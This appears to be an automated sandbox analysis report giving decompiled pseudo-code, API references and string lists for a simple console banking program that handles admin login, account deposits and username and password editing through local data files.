                                              0x00d824a7
                                              0x00d82505
                                              0x00d8250e
                                              0x00d82513
                                              0x00d82518
                                              0x00d82524
                                              0x00d82529
                                              0x00d8252e
                                              0x00d82533
                                              0x00d824a9
                                              0x00d824ac
                                              0x00000000
                                              0x00d824b3
                                              0x00000000
                                              0x00000000
                                              0x00d824ba
                                              0x00000000
                                              0x00000000
                                              0x00d824c1
                                              0x00000000
                                              0x00000000
                                              0x00d824c8
                                              0x00000000
                                              0x00000000
                                              0x00d824cf
                                              0x00d824d8
                                              0x00d824dd
                                              0x00d824e2
                                              0x00d824e7
                                              0x00d824ea
                                              0x00d824ee
                                              0x00d824f1
                                              0x00d824fc
                                              0x00d824fe
                                              0x00d824f3
                                              0x00d824f7
                                              0x00d824fa
                                              0x00000000
                                              0x00000000
                                              0x00d824fa
                                              0x00000000
                                              0x00000000
                                              0x00d824ac
                                              0x00d82536
                                              0x00d82536
                                              0x00d8253b
                                              0x00d8253b
                                              0x00d82546

                                              APIs
                                                • Part of subcall function 00D81250: GetStdHandle.KERNEL32(000000F5,00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81271
                                                • Part of subcall function 00D81250: SetConsoleCursorPosition.KERNEL32(00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81278
                                              • _wprintf.LIBCMT ref: 00D822D7
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D8133D
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D8137B
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D8139C
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D81410
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D81433
                                              • _wprintf.LIBCMT ref: 00D822FA
                                                • Part of subcall function 00D870FC: __stbuf.LIBCMT ref: 00D87148
                                                • Part of subcall function 00D870FC: __output_s_l.LIBCMT ref: 00D87162
                                                • Part of subcall function 00D870FC: __ftbuf.LIBCMT ref: 00D87176
                                              • _wscanf.LIBCMT ref: 00D8230B
                                                • Part of subcall function 00D8732B: _vwscanf.LIBCMT ref: 00D8733C
                                              • _wprintf.LIBCMT ref: 00D82321
                                                • Part of subcall function 00D81290: _wprintf.LIBCMT ref: 00D812C9
                                              • _wprintf.LIBCMT ref: 00D82354
                                              • _wprintf.LIBCMT ref: 00D823BF
                                                • Part of subcall function 00D82560: _wprintf.LIBCMT ref: 00D825CD
                                                • Part of subcall function 00D82560: _wscanf.LIBCMT ref: 00D825DF
                                                • Part of subcall function 00D82560: _swscanf.LIBCMT ref: 00D82621
                                                • Part of subcall function 00D82560: _wprintf.LIBCMT ref: 00D82671
                                              • _wprintf.LIBCMT ref: 00D8236A
                                                • Part of subcall function 00D87751: _doexit.LIBCMT ref: 00D8775B
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820F2
                                              • _wprintf.LIBCMT ref: 00D823E4
                                              • _wprintf.LIBCMT ref: 00D823FA
                                              • _wprintf.LIBCMT ref: 00D82410
                                              • _wprintf.LIBCMT ref: 00D82426
                                              • _wprintf.LIBCMT ref: 00D8243C
                                              • _wprintf.LIBCMT ref: 00D8246A
                                              • _wprintf.LIBCMT ref: 00D82482
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D8209F
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820DE
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820FF
                                                • Part of subcall function 00D82080: __wstrtime.LIBCMT ref: 00D8210C
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D82128
                                                • Part of subcall function 00D82080: __wstrtime.LIBCMT ref: 00D82135
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D82168
                                              Strings
                                              • Press ENTER to return to main menu..., xrefs: 00D82529
                                              • Are you sure you want to exit? <Y/N> : , xrefs: 00D824DD
                                              • Enter User name : , xrefs: 00D822F5
                                              • Press any key to exit the program..., xrefs: 00D82365
                                              • 2. Delete User, xrefs: 00D823F5
                                              • 4. View User Log, xrefs: 00D82421
                                              • ADMIN, xrefs: 00D82379
                                              • 3. Edit User name / Password, xrefs: 00D8240B
                                              • Your input is out of range! Enter a choice between 1 to 5!, xrefs: 00D82513
                                              • Password : , xrefs: 00D8231C
                                              • 5. Exit, xrefs: 00D82437
                                              • IOE, xrefs: 00D8238E
                                              • Only THREE attempts shall be allowed to enter username and password., xrefs: 00D822D2
                                              • Press a number between the range [1 -5] , xrefs: 00D8247D
                                              • 1. Add User, xrefs: 00D823DF
                                              • N, xrefs: 00D8245F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf_doexit_swscanf_vwscanf
                                              • String ID: Press a number between the range [1 -5] $1. Add User$2. Delete User$3. Edit User name / Password$4. View User Log$5. Exit$ADMIN$Are you sure you want to exit? <Y/N> : $Enter User name : $IOE$N$Only THREE attempts shall be allowed to enter username and password.$Password : $Press ENTER to return to main menu...$Press any key to exit the program...$Your input is out of range! Enter a choice between 1 to 5!
                                              • API String ID: 3691436685-2046970424
                                              • Opcode ID: ca8cde14146e4d7957cd74c70c0c3fb58cb187512071ab2955145862401ef74e
                                              • Instruction ID: e5d31353c2e22761849bf78e07227f3d3e26a12d6f3722797f4994def8c0ca21
                                              • Opcode Fuzzy Hash: ca8cde14146e4d7957cd74c70c0c3fb58cb187512071ab2955145862401ef74e
                                              • Instruction Fuzzy Hash: 57613EB4E84304EAEB10B7A49C47BAE7664EF51B15F240034F645B91C2EAB1A24C977B
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D845E0, Relevance: 52.8, APIs: 14, Strings: 16, Instructions: 252COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 44%
                                              			E00D845E0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v42;
				char _v62;
				char _v112;
				char _v113;
				char _v125;
				char _v140;
				char _v170;
				char _v200;
				char _v208;
				char _v244;
				char _v280;
				char _v360;
				char _v440;
				void* __ebp;
				void* _t57;
				char _t73;
				intOrPtr _t75;
				void* _t80;
				intOrPtr _t81;
				intOrPtr _t86;
				void* _t93;
				intOrPtr _t103;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr _t129;
				intOrPtr _t134;
				void* _t137;
				void* _t141;
				void* _t151;
				void* _t153;
				void* _t154;
				void* _t163;

				_t170 = __fp0;
				_t168 = __eflags;
				_t136 = __esi;
				_t135 = __edi;
				_t101 = __ebx;
				_v16 = 0;
				E00D82080(__ecx, __edi, __esi, __eflags, __fp0);
				E00D81250(5, 0xa);
				_push("Deposit to A/C number            : ");
				E00D870FC(__ebx, __edi, __esi, __eflags);
				E00D8732B("%s",  &_v28);
				 *0xda2f28 = E00D86E91("ACCOUNT.DAT", "r");
				_t103 =  *0xda2f28; // 0x0
				_push(_t103);
				E00D86D56(__ebx, _t135, _t136, _t168);
				_t141 = _t137 + 0x18;
				_t169 = _v16;
				if(_v16 == 0) {
					E00D82080(_t103, _t135, _t136, _t169, __fp0);
					E00D81250(0x14, 0xc);
					_push("Given A/C number does not exits!");
					return E00D870FC(_t101, _t135, _t136, _t169);
				}
				E00D81250(0x32, 0xa);
				_push( &_v244);
				_push("[ %s ]");
				E00D870FC(_t101, _t135, _t136, __eflags);
				E00D81250(5, 0xc);
				_push("Amount to be Deposited (in NRs.) : ");
				E00D870FC(_t101, _t135, _t136, __eflags);
				E00D8732B("%f",  &_v12);
				E00D82080(_t103, _t135, _t136, __eflags, __fp0);
				E00D81250(0x1e, 0xa);
				_push("Confirm Transaction");
				_t57 = E00D870FC(_t101, _t135, _t136, __eflags);
				asm("movss xmm0, [ebp-0x8]");
				asm("movss [esp], xmm0");
				E00D81810(_t57,  &_v280);
				E00D81250(3, 0xc);
				_push( &_v244);
				_push( &_v28);
				E00D870FC(_t101, _t135, _t136, __eflags);
				asm("cvtss2sd xmm0, [ebp-0x8]");
				asm("movsd [esp], xmm0");
				E00D81AD0( &_v440, "%s to be deposited in A/C number : %s [ %s ]",  &_v280);
				E00D880E0( &_v360,  &_v440);
				E00D880E0( &_v360, "]");
				E00D81250(0x28 - (E00D88260( &_v360) >> 1), 0xe);
				_push( &_v360);
				E00D871C9(_t101, _t135, _t136, __eflags);
				E00D81250(8, 0x11);
				_push("Are you sure you want to perform this tranasction? <Y/N>");
				E00D870FC(_t101, _t135, _t136, __eflags);
				_t151 = _t141 + 0x24 - 8 + 0x1c;
				_t73 = _v5;
				__eflags = _t73 - 0x59;
				if(_t73 == 0x59) {
					L4:
					 *0xda2f28 = E00D86E91("ACCOUNT.DAT", "r");
					_t75 = E00D86E91("TEMP.DAT", "a");
					_t153 = _t151 + 0x10;
					 *0xda2f24 = _t75;
					while(1) {
						_push( &_v32);
						_push( &_v36);
						_push( &_v40);
						_push( &_v42);
						_push( &_v140);
						_push( &_v113);
						_push( &_v62);
						_push( &_v112);
						_push( &_v125);
						_push( &_v170);
						_push( &_v200);
						_t129 =  *0xda2f28; // 0x0
						_t80 = E00D86FC1(_t129, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
						_t154 = _t153 + 0x38;
						__eflags = _t80 - 0xffffffff;
						if(__eflags == 0) {
							break;
						}
						_t93 = E00D881D0( &_v208,  &_v28);
						_t163 = _t154 + 8;
						__eflags = _t93;
						if(__eflags == 0) {
							asm("movss xmm0, [ebp-0x24]");
							asm("addss xmm0, [ebp-0x8]");
							asm("movss [ebp-0x24], xmm0");
						}
						asm("movss xmm0, [ebp-0x24]");
						asm("addss xmm0, [ebp-0x20]");
						asm("movss [ebp-0x1c], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x1c]");
						asm("movsd [esp], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x20]");
						asm("movsd [esp], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x24]");
						asm("movsd [esp], xmm0");
						_push(_v42);
						_push( &_v140);
						_push(_v113);
						_push( &_v62);
						_push( &_v112);
						_push( &_v125);
						_push( &_v170);
						_push( &_v200);
						_push( &_v208);
						_push("%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f\n");
						_t134 =  *0xda2f24; // 0x0
						_push(_t134);
						E00D86EA6(_t101, _t135, _t136, __eflags);
						_t153 = _t163 - 0xfffffffffffffff8 + 0x44;
					}
					_t81 =  *0xda2f24; // 0x0
					_push(_t81);
					E00D86D56(_t101, _t135, _t136, __eflags);
					_t113 =  *0xda2f28; // 0x0
					_push(_t113);
					E00D86D56(_t101, _t135, _t136, __eflags);
					 *0xda2f28 = E00D86E91("TRANSACTION.DAT", "a");
					E00D883B7(__eflags, 0xda2f30);
					_push(0xda2ee4);
					asm("cvtss2sd xmm0, [ebp-0x8]");
					asm("movsd [esp], xmm0");
					_push(0xda2f30);
					_push(0xda2f40);
					_push("Cash+Deposited");
					_push( &_v28);
					_push("%s %s %s %s %.2f %s\n");
					_t86 =  *0xda2f28; // 0x0
					_push(_t86);
					E00D86EA6(_t101, _t135, _t136, __eflags);
					_t114 =  *0xda2f28; // 0x0
					_push(_t114);
					E00D86D56(_t101, _t135, _t136, __eflags);
					E00D82080(_t114, _t135, _t136, __eflags, _t170);
					E00D81250(0x14, 0xc);
					_push("Transaction completed successfully!");
					return E00D870FC(_t101, _t135, _t136, __eflags);
				}
				__eflags = _v5 - 0x79;
				if(_v5 == 0x79) {
					goto L4;
				}
				return _t73;
			}










































                                              0x00d845e0
                                              0x00d845e0
                                              0x00d845e0
                                              0x00d845e0
                                              0x00d845e0
                                              0x00d845e9
                                              0x00d845f0
                                              0x00d845f9
                                              0x00d845fe
                                              0x00d84603
                                              0x00d84614
                                              0x00d8462e
                                              0x00d84633
                                              0x00d84639
                                              0x00d8463a
                                              0x00d8463f
                                              0x00d84642
                                              0x00d84646
                                              0x00d84648
                                              0x00d84651
                                              0x00d84656
                                              0x00000000
                                              0x00d84660
                                              0x00d8466c
                                              0x00d84677
                                              0x00d84678
                                              0x00d8467d
                                              0x00d84689
                                              0x00d8468e
                                              0x00d84693
                                              0x00d846a4
                                              0x00d846ac
                                              0x00d846b5
                                              0x00d846ba
                                              0x00d846bf
                                              0x00d846c4
                                              0x00d846c9
                                              0x00d846d5
                                              0x00d846de
                                              0x00d846e9
                                              0x00d846ed
                                              0x00d846fa
                                              0x00d84709
                                              0x00d84711
                                              0x00d84716
                                              0x00d84729
                                              0x00d8473d
                                              0x00d84760
                                              0x00d8476b
                                              0x00d8476c
                                              0x00d84778
                                              0x00d8477d
                                              0x00d84782
                                              0x00d84787
                                              0x00d8478a
                                              0x00d8478e
                                              0x00d84791
                                              0x00d847a0
                                              0x00d847b2
                                              0x00d847c1
                                              0x00d847c6
                                              0x00d847c9
                                              0x00d847ce
                                              0x00d847d1
                                              0x00d847d5
                                              0x00d847d9
                                              0x00d847dd
                                              0x00d847e4
                                              0x00d847e8
                                              0x00d847ec
                                              0x00d847f0
                                              0x00d847f4
                                              0x00d847fb
                                              0x00d84802
                                              0x00d8480f
                                              0x00d84816
                                              0x00d8481b
                                              0x00d8481e
                                              0x00d84821
                                              0x00000000
                                              0x00000000
                                              0x00d84832
                                              0x00d84837
                                              0x00d8483a
                                              0x00d8483c
                                              0x00d8483e
                                              0x00d84843
                                              0x00d84848
                                              0x00d84848
                                              0x00d8484d
                                              0x00d84852
                                              0x00d84857
                                              0x00d8485c
                                              0x00d84864
                                              0x00d84869
                                              0x00d84871
                                              0x00d84876
                                              0x00d8487e
                                              0x00d84887
                                              0x00d8488e
                                              0x00d84893
                                              0x00d84897
                                              0x00d8489b
                                              0x00d8489f
                                              0x00d848a6
                                              0x00d848ad
                                              0x00d848b4
                                              0x00d848b5
                                              0x00d848ba
                                              0x00d848c0
                                              0x00d848c1
                                              0x00d848c6
                                              0x00d848c6
                                              0x00d848ce
                                              0x00d848d3
                                              0x00d848d4
                                              0x00d848dc
                                              0x00d848e2
                                              0x00d848e3
                                              0x00d848fd
                                              0x00d84907
                                              0x00d8490f
                                              0x00d84914
                                              0x00d8491c
                                              0x00d84921
                                              0x00d84926
                                              0x00d8492b
                                              0x00d84933
                                              0x00d84934
                                              0x00d84939
                                              0x00d8493e
                                              0x00d8493f
                                              0x00d84947
                                              0x00d8494d
                                              0x00d8494e
                                              0x00d84956
                                              0x00d8495f
                                              0x00d84964
                                              0x00000000
                                              0x00d8496e
                                              0x00d84797
                                              0x00d8479a
                                              0x00000000
                                              0x00000000
                                              0x00d84974

                                              APIs
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D8209F
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820DE
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820FF
                                                • Part of subcall function 00D82080: __wstrtime.LIBCMT ref: 00D8210C
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D82128
                                                • Part of subcall function 00D82080: __wstrtime.LIBCMT ref: 00D82135
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D82168
                                                • Part of subcall function 00D81250: GetStdHandle.KERNEL32(000000F5,00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81271
                                                • Part of subcall function 00D81250: SetConsoleCursorPosition.KERNEL32(00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81278
                                              • _wprintf.LIBCMT ref: 00D84603
                                              • _wscanf.LIBCMT ref: 00D84614
                                                • Part of subcall function 00D8732B: _vwscanf.LIBCMT ref: 00D8733C
                                                • Part of subcall function 00D86E91: __fsopen.LIBCMT ref: 00D86E9C
                                              • _wprintf.LIBCMT ref: 00D8465B
                                                • Part of subcall function 00D870FC: __stbuf.LIBCMT ref: 00D87148
                                                • Part of subcall function 00D870FC: __output_s_l.LIBCMT ref: 00D87162
                                                • Part of subcall function 00D870FC: __ftbuf.LIBCMT ref: 00D87176
                                              • _wprintf.LIBCMT ref: 00D8467D
                                              • _wprintf.LIBCMT ref: 00D84693
                                              • _wscanf.LIBCMT ref: 00D846A4
                                              • _wprintf.LIBCMT ref: 00D846BF
                                              • _wprintf.LIBCMT ref: 00D846FA
                                              • _wprintf.LIBCMT ref: 00D84782
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820F2
                                              Strings
                                              • Given A/C number does not exits!, xrefs: 00D84656
                                              • Amount to be Deposited (in NRs.) : , xrefs: 00D8468E
                                              • Cash+Deposited, xrefs: 00D8492B
                                              • Are you sure you want to perform this tranasction? <Y/N>, xrefs: 00D8477D
                                              • Transaction completed successfully!, xrefs: 00D84964
                                              • [ %s ], xrefs: 00D84678
                                              • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 00D8480A
                                              • ACCOUNT.DAT, xrefs: 00D847A5
                                              • Confirm Transaction, xrefs: 00D846BA
                                              • TRANSACTION.DAT, xrefs: 00D848F0
                                              • %s %s %s %s %.2f %s, xrefs: 00D84934
                                              • %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 00D848B5
                                              • Deposit to A/C number : , xrefs: 00D845FE
                                              • ACCOUNT.DAT, xrefs: 00D84621
                                              • %s to be deposited in A/C number : %s [ %s ], xrefs: 00D846F5
                                              • TEMP.DAT, xrefs: 00D847BC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vwscanf
                                              • String ID: %s %s %s %s %.2f %s$%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$%s to be deposited in A/C number : %s [ %s ]$ACCOUNT.DAT$ACCOUNT.DAT$Amount to be Deposited (in NRs.) : $Are you sure you want to perform this tranasction? <Y/N>$Cash+Deposited$Confirm Transaction$Deposit to A/C number : $Given A/C number does not exits!$TEMP.DAT$TRANSACTION.DAT$Transaction completed successfully!$[ %s ]
                                              • API String ID: 532294799-930819241
                                              • Opcode ID: 4a9a57e43a18420231b7e6bf6ad62de72f5877a7aa9c27ca7f4d16fcf1f445fe
                                              • Instruction ID: eaaf4df6763eb63a024e3b21fd667d9ba0e6a97977d2fc2f8320a572d71afa0a
                                              • Opcode Fuzzy Hash: 4a9a57e43a18420231b7e6bf6ad62de72f5877a7aa9c27ca7f4d16fcf1f445fe
                                              • Instruction Fuzzy Hash: 34914DB2D40308AEDB11FBA58C43EEE7778EF5A710F044259F60566181FA71A64C8BB6
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D82AB0, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 243COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 80%
                                              			E00D82AB0(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v19;
				char _v23;
				char _v27;
				char _v31;
				char _v35;
				char _v39;
				char _v43;
				char _v47;
				char _v48;
				char _v51;
				char _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v71;
				char _v75;
				char _v79;
				char _v80;
				char _v83;
				char _v87;
				char _v91;
				char _v95;
				char _v99;
				char _v103;
				char _v107;
				char _v111;
				char _v112;
				char _v144;
				char _v176;
				char _v208;
				void* __ebp;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t68;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t87;
				void* _t88;
				intOrPtr _t89;
				intOrPtr _t95;
				intOrPtr _t98;
				intOrPtr _t105;
				char _t106;
				void* _t109;
				void* _t110;
				intOrPtr _t119;
				intOrPtr _t130;
				intOrPtr _t132;
				void* _t136;
				void* _t140;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t149;
				void* _t150;
				void* _t154;

				_t161 = __fp0;
				_t135 = __esi;
				_t134 = __edi;
				_t113 = __ebx;
				_v48 = 0;
				_v47 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_v31 = 0;
				_v27 = 0;
				_v23 = 0;
				_v19 = 0;
				_v112 = 0;
				_v111 = 0;
				_v107 = 0;
				_v103 = 0;
				_v99 = 0;
				_v95 = 0;
				_v91 = 0;
				_v87 = 0;
				_v83 = 0;
				_v80 = 0;
				_v79 = 0;
				_v75 = 0;
				_v71 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v16 = 0;
				_v12 = 0;
				E00D82080(0, __edi, __esi, 0, __fp0);
				E00D81250(0x19, 8);
				_push("User Name  : ");
				E00D870FC(__ebx, __edi, __esi, 0);
				E00D8732B("%s", 0xda2ee4);
				E00D81250(0x19, 0xa);
				_push("Password  : ");
				E00D870FC(__ebx, __edi, __esi, 0);
				E00D81290(_t134, _t135,  &_v112);
				_t66 = E00D86E91("USER.DAT", "r");
				_t140 = _t136 + 0x18;
				 *0xda2f28 = _t66;
				while(1) {
					_push( &_v144);
					_push( &_v176);
					_t67 =  *0xda2f28; // 0x0
					_t68 = E00D86FC1(_t67, "%s %s %s\n", 0xda2ee0);
					_t141 = _t140 + 0x14;
					if(_t68 == 0xffffffff) {
						break;
					}
					_t109 = E00D881D0(0xda2ee4,  &_v176);
					_t140 = _t141 + 8;
					if(_t109 == 0) {
						_t110 = E00D881D0(0xda2f02,  &_v144);
						_t140 = _t140 + 8;
						if(_t110 == 0) {
							_v16 = _v16 + 1;
						}
					}
				}
				_t116 =  *0xda2f28; // 0x0
				_push(_t116);
				E00D86D56(_t113, _t134, _t135, __eflags);
				_t142 = _t141 + 4;
				E00D82080(_t116, _t134, _t135, __eflags, _t161);
				__eflags = _v16;
				if(__eflags != 0) {
					E00D81250(8, 0xa);
					_push("Are you sure you want to CHANGE user name and/or password? <Y/N> : ");
					E00D870FC(_t113, _t134, _t135, __eflags);
					_t143 = _t142 + 4;
					__eflags = _v5 - 0x59;
					if(__eflags == 0) {
						do {
							L10:
							E00D82080(_t116, _t134, _t135, __eflags, _t161);
							_v12 = 0;
							E00D81250(0x19, 8);
							_push("NEW User Name        : ");
							E00D870FC(_t113, _t134, _t135, __eflags);
							E00D8732B("%s",  &_v208);
							E00D81250(0x19, 0xa);
							_push("NEW Password         : ");
							E00D870FC(_t113, _t134, _t135, __eflags);
							E00D81290(_t134, _t135,  &_v48);
							E00D81250(0x19, 0xc);
							_push("Confirm NEW Password : ");
							E00D870FC(_t113, _t134, _t135, __eflags);
							E00D81290(_t134, _t135,  &_v80);
							_t116 =  &_v80;
							_t84 = E00D881D0( &_v48,  &_v80);
							_t143 = _t143 + 0x1c;
							__eflags = _t84;
							if(__eflags != 0) {
								E00D82080( &_v80, _t134, _t135, __eflags, _t161);
								E00D81250(0xa, 0xa);
								_push(0xd9f710);
								E00D870FC(_t113, _t134, _t135, __eflags);
								_t143 = _t143 + 4;
								_t105 = _v12 + 1;
								__eflags = _t105;
								_v12 = _t105;
							}
							__eflags = _v12;
						} while (__eflags != 0);
						 *0xda2f28 = E00D86E91("USER.DAT", 0xd9f740);
						_t86 = E00D86E91("temp.dat", "a");
						_t149 = _t143 + 0x10;
						 *0xda2f20 = _t86;
						while(1) {
							_push( &_v144);
							_push( &_v176);
							_t87 =  *0xda2f28; // 0x0
							_t88 = E00D86FC1(_t87, "%s %s %s\n", 0xda2ee0);
							_t150 = _t149 + 0x14;
							__eflags = _t88 - 0xffffffff;
							if(__eflags == 0) {
								break;
							}
							_t95 = E00D881D0(0xda2ee4,  &_v176);
							_t154 = _t150 + 8;
							__eflags = _t95;
							if(__eflags != 0) {
								L17:
								_push( &_v144);
								_push( &_v176);
								_push(0xda2ee0);
								_push("%s %s %s\n");
								_t130 =  *0xda2f20; // 0x0
								_push(_t130);
								E00D86EA6(_t113, _t134, _t135, __eflags);
								_t149 = _t154 + 0x14;
								L19:
								continue;
							}
							_t98 = E00D881D0(0xda2f02,  &_v144);
							_t154 = _t154 + 8;
							__eflags = _t98;
							if(__eflags == 0) {
								_push( &_v48);
								_push( &_v208);
								_push(0xda2ee0);
								_push("%s %s %s\n");
								_t132 =  *0xda2f20; // 0x0
								_push(_t132);
								E00D86EA6(_t113, _t134, _t135, __eflags);
								_t149 = _t154 + 0x14;
								goto L19;
							}
							goto L17;
						}
						_t89 =  *0xda2f28; // 0x0
						_push(_t89);
						E00D86D56(_t113, _t134, _t135, __eflags);
						_t119 =  *0xda2f20; // 0x0
						_push(_t119);
						E00D86D56(_t113, _t134, _t135, __eflags);
						E00D82080(_t119, _t134, _t135, __eflags, _t161);
						E00D81250(0x19, 0xa);
						_push("Record has been EDITED successfully!");
						return E00D870FC(_t113, _t134, _t135, __eflags);
					}
					_t106 = _v5;
					__eflags = _t106 - 0x79;
					if(__eflags != 0) {
						return _t106;
					}
					goto L10;
				}
				E00D81250(0xa, 0xa);
				_push(0xd9f640);
				return E00D870FC(_t113, _t134, _t135, __eflags);
			}






























































                                              0x00d82ab0
                                              0x00d82ab0
                                              0x00d82ab0
                                              0x00d82ab0
                                              0x00d82ab9
                                              0x00d82abf
                                              0x00d82ac2
                                              0x00d82ac5
                                              0x00d82ac8
                                              0x00d82acb
                                              0x00d82ace
                                              0x00d82ad1
                                              0x00d82ad4
                                              0x00d82ad7
                                              0x00d82add
                                              0x00d82ae0
                                              0x00d82ae3
                                              0x00d82ae6
                                              0x00d82ae9
                                              0x00d82aec
                                              0x00d82aef
                                              0x00d82af2
                                              0x00d82af5
                                              0x00d82afb
                                              0x00d82afe
                                              0x00d82b01
                                              0x00d82b04
                                              0x00d82b07
                                              0x00d82b0a
                                              0x00d82b0d
                                              0x00d82b10
                                              0x00d82b13
                                              0x00d82b1a
                                              0x00d82b21
                                              0x00d82b2a
                                              0x00d82b2f
                                              0x00d82b34
                                              0x00d82b46
                                              0x00d82b52
                                              0x00d82b57
                                              0x00d82b5c
                                              0x00d82b68
                                              0x00d82b77
                                              0x00d82b7c
                                              0x00d82b7f
                                              0x00d82b84
                                              0x00d82b8a
                                              0x00d82b91
                                              0x00d82b9c
                                              0x00d82ba2
                                              0x00d82ba7
                                              0x00d82bad
                                              0x00000000
                                              0x00000000
                                              0x00d82bbb
                                              0x00d82bc0
                                              0x00d82bc5
                                              0x00d82bd3
                                              0x00d82bd8
                                              0x00d82bdd
                                              0x00d82be5
                                              0x00d82be5
                                              0x00d82bdd
                                              0x00d82be8
                                              0x00d82bea
                                              0x00d82bf0
                                              0x00d82bf1
                                              0x00d82bf6
                                              0x00d82bf9
                                              0x00d82bfe
                                              0x00d82c02
                                              0x00d82c23
                                              0x00d82c28
                                              0x00d82c2d
                                              0x00d82c32
                                              0x00d82c39
                                              0x00d82c3c
                                              0x00d82c4b
                                              0x00d82c4b
                                              0x00d82c4b
                                              0x00d82c50
                                              0x00d82c5b
                                              0x00d82c60
                                              0x00d82c65
                                              0x00d82c79
                                              0x00d82c85
                                              0x00d82c8a
                                              0x00d82c8f
                                              0x00d82c9b
                                              0x00d82ca4
                                              0x00d82ca9
                                              0x00d82cae
                                              0x00d82cba
                                              0x00d82cbf
                                              0x00d82cc7
                                              0x00d82ccc
                                              0x00d82ccf
                                              0x00d82cd1
                                              0x00d82cd3
                                              0x00d82cdc
                                              0x00d82ce1
                                              0x00d82ce6
                                              0x00d82ceb
                                              0x00d82cf1
                                              0x00d82cf1
                                              0x00d82cf4
                                              0x00d82cf4
                                              0x00d82cf7
                                              0x00d82cf7
                                              0x00d82d13
                                              0x00d82d22
                                              0x00d82d27
                                              0x00d82d2a
                                              0x00d82d2f
                                              0x00d82d35
                                              0x00d82d3c
                                              0x00d82d47
                                              0x00d82d4d
                                              0x00d82d52
                                              0x00d82d55
                                              0x00d82d58
                                              0x00000000
                                              0x00000000
                                              0x00d82d6a
                                              0x00d82d6f
                                              0x00d82d72
                                              0x00d82d74
                                              0x00d82d8e
                                              0x00d82d94
                                              0x00d82d9b
                                              0x00d82d9c
                                              0x00d82da1
                                              0x00d82da6
                                              0x00d82dac
                                              0x00d82dad
                                              0x00d82db2
                                              0x00d82ddb
                                              0x00000000
                                              0x00d82ddb
                                              0x00d82d82
                                              0x00d82d87
                                              0x00d82d8a
                                              0x00d82d8c
                                              0x00d82dba
                                              0x00d82dc1
                                              0x00d82dc2
                                              0x00d82dc7
                                              0x00d82dcc
                                              0x00d82dd2
                                              0x00d82dd3
                                              0x00d82dd8
                                              0x00000000
                                              0x00d82dd8
                                              0x00000000
                                              0x00d82d8c
                                              0x00d82de0
                                              0x00d82de5
                                              0x00d82de6
                                              0x00d82dee
                                              0x00d82df4
